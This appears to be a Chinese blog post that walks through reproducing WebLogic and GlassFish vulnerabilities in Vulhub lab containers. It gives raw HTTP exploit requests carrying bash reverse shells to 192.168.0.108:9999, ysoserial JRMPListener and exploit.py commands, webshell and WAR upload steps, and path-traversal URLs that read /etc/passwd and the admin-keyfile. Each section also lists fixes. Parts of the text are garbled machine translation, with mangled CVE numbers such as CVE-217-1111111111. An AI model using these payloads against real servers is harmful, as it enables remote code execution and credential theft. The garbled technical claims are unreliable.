继续上篇复现中间常见的件漏洞

在虚拟机中安装docker环境具体不再演示了Vulhub - Docker-Compose file for漏洞环境

网络逻辑

WebLogic 是美国公司出品的一款应用服务器，确切的说是一个基于 JAVAEE 架构的服务器，WebLogic 是、集成、部署和管理大型 Web 应用、网络应用开发和数据库的 Java 应用服务器。 Java的动态功能和Java企业标准的安全性引入了大型网络应用的开发、集成、部署和管理当中。

XMLDecoder 反序列化漏洞（CVE-2017-3506 & CVE-2017-10271）

影响版本：Weblogic < 10.3.6

漏洞利用形成 WLS 组件额外提供的 Web 服务服务使用了 XMLDevex 来解析命令出现的序列用户的过程中，Weblogic 中的数据，在解析中生成反化漏洞，导致编码器发生异常。

使用docker环境

成功浏览器访问：http://127.0.0.1:7001/，界面上出现Error 404--Not Found，即启动。

访问 /wls-wsat/CoordinatorPortType 返回如下页面，则可能存在此漏洞

只要是在wls -wsat/CoordinatorPortType的情况下。只要
是在wls-wsat中的Uri都会受到影响，可以查看web.xml包中的所有会在Uri中受到影响，路径为：\Oracle\iddleware\user_projects\domains\ base_domain\servers\AdminServer\tmp\_WL_internal\wls-wsat\54p17w\war\WEB-INF\web.xml
会受到 Uri 的影响：

/wls-wsat/CoordinatorPortType/wls-wsat/RegistrationPortTypeRPC/wls-wsat/ParticipantPortType/wls-wsat/RegistrationRequesterPortType/wls-wsat/CoordinatorPortType11/wls-wsat/RegistrationPortTypeRPC11/wls-wsat/ParticipantPortType11/wls-wsat/RegistrationRequesterPortType11

抓取包POST写入数据，其中Content-Type需要解译，否则可能导致XML编码器不解析。

这句会写入一个test.jsp访问会打印，真实性写shell

POST /wls-wsat/CoordinatorPortType HTTP/1.1Host: 127.0.0.1:7001Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeContent-Type: text/xmlContent-Length: 533servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test.jsp]]>

访问/bea_wls_internal/test.jsp，如下，可以看到写入成功

验证成功漏洞，然后通过下面的命令执行反弹到本地，这里反弹ip不能是1270.0.1，因此反弹不到。

POST /wls-wsat/CoordinatorPortType HTTP/1.1Host: 127.0.0.1:7001Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeContent-Type: text/xmlContent-Length: 638 /bin/bash-cbash -i >& /dev/tcp/192.168.0.108/9999 0>&1

也可以写入jsp webshell，这里就不演示了

CVE-2017-3506 的上传添加了验证函数，解决方法在 weblogic/wsee/workarea/WorkContextXmlInputAdapter.java 中添加了validate 验证有效负载中的节点是否存在对象标签。

将换成这样就可以替换了，产生了CVE-2017-171，还可以换成阵列，新的等我们换成对象。

servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test.jsp]]>

修复建议：

• 安装更新。

• 或删除wls-wsat组件，再次访问返回404。

1.删除C:\Oracle\Middleware\wlserver_10.3\server\lib\wls-wsat.war2.删除C:\Oracle\Middleware\user_projects\domains\base_domain\servers\AdminServer\tmp\.internal\wls-wsat.war3.删除C:\Oracle\Middleware\user_projects\domains\base_domain\servers\AdminServer\tmp\_WL_internal\wls-wsat

Weblogic wls9_async_response,wls-wsat 反序列化远程执行代码漏洞（CVE-2019-2725）

影响组件：bea_wls9_async_response.war, wls-wsat.war

影响版本：10.3.6.0, 12.1.3.0

访问 /_async/AsyncResponseService 以下页面，则可能存在返回此漏洞。

漏洞存在于/AsyncResponseService 是在bea_wls9_async_response_包中的Uri 都会受到影响，可以查看web.xml 在所有的Uri 中都会受到影响，路径为：\Oraclebase_domain\servers\Admin\Server tmp\_WL_internal\bea_wls9_async_response\8tpkys\war\WEB-INF\web.xml
会受到 Uri 的影响：

/_async/AsyncResponseService/_async/AsyncResponseServiceJms/_async/AsyncResponseServiceHttps

这个漏洞实际上是CVE-2017-10271的又一入口。

CVE-20173506 的结果是过滤了对象，CVE-2017-10271-的结果是过滤了新的，方法标签，void 后面只能跟索引，数组后面可以类，但是必须是字节类型的。

轮到CVE-217-1111111111因为class0207标签过滤所带来的

有效载荷：

POST /_async/AsyncResponseService HTTP/1.1Host: 127.0.0.1:7001Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeContent-Type: text/xmlContent-Length: 786xxxx/bin/bash-cbash -i >& /dev/tcp/192.168.0.108/9999 0>&1

Weblogic WLS Core Components 反序列化命令执行漏洞（CVE-2018-2628）

Weblogic Server WLS Core Components反序列化命令执行漏洞（CVE-2018-2628），该漏洞通过t3协议触发，可导致未授权的用户在远程服务器执行任意命令。

下载ysoserial.jar ysoserial-0.0.6-SNAPSHOT-BETA-all.jar

使用ysoserial.jar，启动JRMP Server，我创建了一个1_Ry文件夹，JRMP Server监听的端口为9999

java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 9999 CommonsCollections1 'touch /tmp/1_Ry'

然后，使用exploit.py脚本，向目标Weblogic（http://your-ip:7001）发送数据包：

python exploit.py [victim ip] [victim port] [path to ysoserial] [JRMPListener ip] [JRMPListener port] [JRMPClient]

其中，是目标weblogic的IP和端口，是本地的串行的路径，先和地址中启动JRMP Server的IP值和端口。是执行[victim ip]MPClient的类，可选的是或或。[victim port][path to ysoserial][JRMPListener ip][JRMPListener port][JRMPClient]JRMPClientJRMPClient2

下面是我的构造的有效载荷

python exploit.py 127.0.0.1 7001 /root/ysoserial-0.0.6-SNAPSHOT-BETA-all.jar 192.168.0.108 9999 JRMPClient2

可以看到命令执行成功，创建了一个 1_Ry 文件夹执行成功

修复建议：

• 过滤t3协议。

• 安装升级

Weblogic 任意文件上传漏洞（CVE-2018-2894）

影响版本：12.1.3.0、12.2.1.2、12.2.1.3

漏洞形成 Web Service Test Page：Web Service 必须限制“Web 文件上传漏洞”，开启“生产模式下默认不开启，所以该漏洞有限制。

若需在Weblogic生产模式下进行复现，则需要登录后台页面，点击base_domain的配置，在“高级”设置中开启“启用Web服务测试页”选项

访问http://your-ip:7001/console，可以查看后台登录页面。

执行docker-compose logs | grep password可查看管理员密码，管理员用户名为weblogic。

后台登录页面，点击base_domain配置，在“高级”中开启“启用Web服务测试页”选项：（记得点保存）

第一次上传点：访问http://127.0.0.1:7001/ws_utc/config.do

设置 Work Home Dir 为 ws_utc 应用的静态文件 css 目录/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css。因为访问这个目录是单独权限的

提交后，点击左侧安全->添加，然后上传Webshell。

提交提交，抓取的返回数据，点击上传，可以看到串号

然后访问http://127.0.0.1:7001/ws_utc/css/config/keystore/[关注]_[文件名]，自动执行webshel l

第二处上传点：http://127.0.0.1:7001/ws_utc/begin.do

点击返回的文件夹，上传网页，并抓取

可以看到返回的路径，直接访问http://127.0.0.1:7001/ws_utc/css/upload/RS_Upload_2022-03-03_14-18-52_934/import_file_name_shell.jsp

Weblogic SSRF漏洞（CVE-2014-4210）

影响版本：10.0.2.0, 10.3.6.0

通过返回数据包中的错误信息，即可检测内网状态。

访问/uddiexplorer/SearchPublicRegistries.jsp，若能正常访问，则可能存在此漏洞，填写任意信息，如下

点击搜索，并抓抓包之后在 Burp 中截取，选择更改请求方式，将 POST 请求更改成 GET。

参数operator为SSRF的可控参数

• 将其更改为打开的端口，如http://127.0.0.1:7001/，将返回错误码

• 如果开放端口为HTTP协议（但22端口显示也是HTTP协议），如http://127.0.0.1:80 一个有效的返回ID没有SOAP内容类型。

• 访问不存在的端口，将返回无法通过 HTTP 连接到服务器

通过数据中的报错信息，可以检测到内网状态。实战中可以通过破解，从返回数据包的长度来判断打开了哪些端口，再根据开放的返回逻辑包使用，这里参考vulhub/web /ssrf at master · vulhub/vulhub (github.com)

修复建议：

• 删除SearchPublicRegistries.jsp文件或修改SearchPublicRegistries.jsp文件后缀为不解析后缀，如SearchPublicRegistries.jspxxx，PublicRegistries.jsp路径为：/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/uddiexplorer/5f6ebw \战争

Weblogic弱弱&&后台getshell

访问http://127.0.0.1:7001/console自动控制台到http://127.0.0.1:7001/console/login/LoginForm.jsp，使用弱登录后台。

进入后台，点击部署，进入点击右侧的安装。

选择上传文件

上传战争包

上传完成 以后你上传的文件，点击下一步

再下一步后直接点击完成智能

可以看到已经部署

访问：http://ip:port/[战争包名]/[包名内文件名]智能

修复建议：

• 避免后台弱

玻璃鱼

GlassFish 是用于制造 Java EE 5 应用程序服务器的开源项目的名称。它基于 Sun Microsystems 提供的 Sun Java System Application Server PE 9 的源代码以及 Oracle 贡献的 TopLink 性能代码。服务的过程，以更快的速度提供新的功能。

8080（Web应用端口，即网站内容），4848（Glass默认鱼管理中心）

GlassFish 任意文件读取漏洞（CVE-2017-1000028）

最新版本：<=4.1.2版本

Java语言中传输%c0%af解析为\uC0AF，最后转义为ASCCII字符的/（斜杠）。利用.%c0%af.%c0%af来向上跳转，到达穿透、任意读取文件的效果。

发现了8个编码接收并指定这是一个计算机进行的标准转义，当发现一个字节000表示ASCII字符，当1100个大意，则取2个字节后去掉110个
模板. UTF8 编码模板如下

C0AF转换位二进制为110 00000 10 101111,111111,11111,11111,110开头去掉后为00000 101111为47，ASSCI为/。

https://your-ip:4848/theme/META-INF%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd

读admin-keyfile文件，该文件是存储管理员密码的文件

https://127.0.0.1:4848/theme/META-INF/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afdomains/domain1/config/admin-keyfile

修复建议

• 升级GlassFish最新版本。

GlassFish后台Getshell

127.0.0.1:4848进入后台后应用，右边的部署

战争包后上传，上下文根这个关系到你访问的url，点击确定。

修复建议

• 不开放后台给外网

• 避免使用弱回